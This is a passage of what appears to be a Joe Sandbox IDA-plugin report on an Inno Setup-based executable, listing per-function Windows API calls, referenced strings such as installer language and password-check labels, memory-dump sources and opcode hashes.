                                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                      • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                      Similarity
                                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 862346643-0
                                                                                                      • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                                      • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                                                      • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                                      • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                                      • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                                      • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveLong$Message
                                                                                                      • String ID:
                                                                                                      • API String ID: 2785966331-0
                                                                                                      • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                                      • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                                      • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                                      • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000), ref: 0042949A
                                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                      Similarity
                                                                                                      • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                      • String ID:
                                                                                                      • API String ID: 361401722-0
                                                                                                      • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                      • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                                      • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                      • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                      Similarity
                                                                                                      • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 2920975243-0
                                                                                                      • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                      • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                                      • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                      • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                                      • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$Load
                                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                                      • API String ID: 1675784387-1948079669
                                                                                                      • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                      • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                                      • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                      • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                      • API String ID: 390214022-3304407042
                                                                                                      • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                                      • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                                      • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                                      • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                                      APIs
                                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                                      • 73A159E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                                      • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A159ClassInfoMessageSend
                                                                                                      • String ID: COMBOBOX$Inno Setup: Language
                                                                                                      • API String ID: 3375322265-4234151509
                                                                                                      • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                      • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                                                      • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                      • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                        • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                        • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                      • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                                                      • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                      • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                        • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                        • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                      • String ID: ,$?
                                                                                                      • API String ID: 2359071979-2308483597
                                                                                                      • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                      • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                                                      • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                      • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                                                      APIs
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                      • String ID:
                                                                                                      • API String ID: 1030595962-0
                                                                                                      • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                      • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                                      • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                      • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                      APIs
                                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                      • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                      • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                      • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                      • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2733548868-0
                                                                                                      • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                      • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                      • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                      • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                                        • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                        • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                        • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                                      • TranslateMessage.USER32(?), ref: 004571EB
                                                                                                      • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                                      • String ID: [Paused]
                                                                                                      • API String ID: 1715372110-4230553315
                                                                                                      • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                                      • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                                      • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                                      • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                                      APIs
                                                                                                      • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LoadSleep
                                                                                                      • String ID: CheckPassword
                                                                                                      • API String ID: 4023313301-1302249611
                                                                                                      • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                                      • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                                      • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                                      • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                        • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                        • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                      • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                                      • GetTickCount.KERNEL32 ref: 00477C02
                                                                                                      • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                                      Strings
                                                                                                      • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                                      • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                      • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                      • API String ID: 613034392-3771334282
                                                                                                      • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                      • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                                      • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                      • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                                                      Strings
                                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                                                      • Fusion.dll, xrefs: 00459B43
                                                                                                      • CreateAssemblyCache, xrefs: 00459B9A
                                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                      • API String ID: 190572456-3990135632
                                                                                                      • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                                      • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                                                      • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                                      • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                                      • GetFocus.USER32 ref: 0041C178
                                                                                                      • 73A0A570.USER32(?), ref: 0041C184
                                                                                                      • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                                      • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                                      • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                                      • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A480A570BitsFocusObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 1424713005-0
                                                                                                      • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                                      • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                                      • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
